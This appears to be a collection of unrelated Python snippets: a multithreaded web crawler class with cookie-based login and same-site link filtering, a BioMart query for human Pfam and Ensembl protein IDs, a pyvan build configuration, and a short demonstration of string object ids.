return ''.join([c for c in content if ord(c) < 128])
class SpiderThread(threading.Thread):
def __init__(self, url_queue, response_queue, finish_event, spider_profile):
threading.Thread.__init__(self)
self.url_queue = url_queue
self.response_queue = response_queue
self.finish_event = finish_event
# load data from the session obj passed in
self.source_url = spider_profile.base_url
self.timeout = spider_profile.timeout
self.profile = spider_profile
self.extractor_class = self.profile.get_extractor_class()
self.headers = {}
self.cookiejar = cookielib.CookieJar()
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))
#urllib2.install_opener(self.opener)
self.working = False
def run(self):
if self.profile.login_url:
self.login()
while not self.finish_event.is_set():
self.process_queue()
if self.profile.delay:
time.sleep(self.profile.delay)
def login(self):
#log in
print "Logging in at", self.profile.login_url, "..."
request = urllib2.Request(url=self.profile.login_url,
data=self.profile.login_details,
headers={})
response = self.opener.open(request)
def process_queue(self):
try:
self.working = True
url, source, depth = self.url_queue.get_nowait()
except Queue.Empty:
self.working = False
time.sleep(1)
except KeyboardInterrupt:
self.working = False
return
else:
try:
crawl_start = time.time()
headers, content, urls = self.crawl(self.source_url, url, self.timeout)
response_time = time.time() - crawl_start
except (UnfetchableURLException, OffsiteLinkException, AttributeError, CannotHandleUrlException, httplib.BadStatusLine):
pass
else:
if self.profile.logged_out_string and self.profile.logged_out_string in force_unicode(content, errors='ignore'):
self.login()
self.url_queue.put((url, source, depth))
self.working = False
return
if 'content-length' not in headers:
headers['content-length'] = len(content)
if 'status' not in headers:
headers['status'] = '200' # ugh. how to get status from urllib2 in crawl()?
if not STORE_CONTENT:
content = ''
results = dict(
url=url,
source_url=source,
content=content,
response_status=int(headers['status']),
response_time=response_time,
content_length=int(headers['content-length']),
headers=headers,
)
self.response_queue.put((results, urls, depth), block=True)
self.url_queue.task_done()
def fetch_url(self, url, timeout):
request = urllib2.Request(url=url,
headers=self.headers)
return self.opener.open(request, timeout=timeout)
def crawl(self, source_url, url, timeout, log=True):
try:
if log:
print "Going to url: %s" % url
if not self.extractor_class.can_handle_url(url, self.opener):
raise CannotHandleUrlException
response = self.fetch_url(url, timeout)
headers_raw = response.info().headers
headers = {}
for header in headers_raw:
(k, s, v) = header.partition(":")
headers[k] = v.strip()
content = response.read()
except socket.error:
raise UnfetchableURLException
except urllib2.URLError:
raise UnfetchableURLException # should be other error
        if is_on_site(source_url, response.geturl()):
            urls = self.extractor_class.get_urls(content)
            return headers, content, self.filter_urls(url, urls)
        else:
            raise OffsiteLinkException
def filter_urls(self, source, urls):
ret = []
for url in urls:
if self.profile.links_ignore_regex and re.search(self.profile.links_ignore_regex, url):
continue
if is_on_site(source, url, self.profile.domain):
ret.append(relative_to_full(source, url))
return ret
|
#!/usr/bin/env python
#----------------------------------------------------------------------------
# ABOUT THE SCRIPT:
# This script can be used to obtain a list of Pfam IDs and corresponding
# Ensembl protein IDs from the Human Genes (GRCh38.p13) dataset from BioMart.
#----------------------------------------------------------------------------
import pandas
from pybiomart import Dataset
# Define which dataset should be queried.
dataset = Dataset(name='hsapiens_gene_ensembl',
host='http://www.ensembl.org')
# Obtain data frame containing the relevant data.
df = dataset.query(attributes=['pfam','ensembl_peptide_id'], only_unique=False)
# Convert the data frame to tab-separated text and print it.
results = df.to_csv(index=False, sep='\t')
print(results)
|
import pyvan
OPTIONS = {
"main_file_name": "final.py",
"show_console": True,
"use_existing_requirements": True,
"extra_pip_install_args": [],
"use_pipreqs": False,
"install_only_these_modules": [],
"exclude_modules": [],
"include_modules": [],
"path_to_get_pip_and_python_embedded_zip": "",
"build_dir": "dist",
"pydist_sub_dir": "pydist",
"source_sub_dir": "",
}
pyvan.build(**OPTIONS)
|
#!/usr/local/bin/python3.8
# Strings are immutable, i.e. they cannot be changed.
print(id('key')) # e.g. 139912821647280
print(id('keys')) # e.g. 139912821775856
print ( id('key') == id('keys') ) # False
|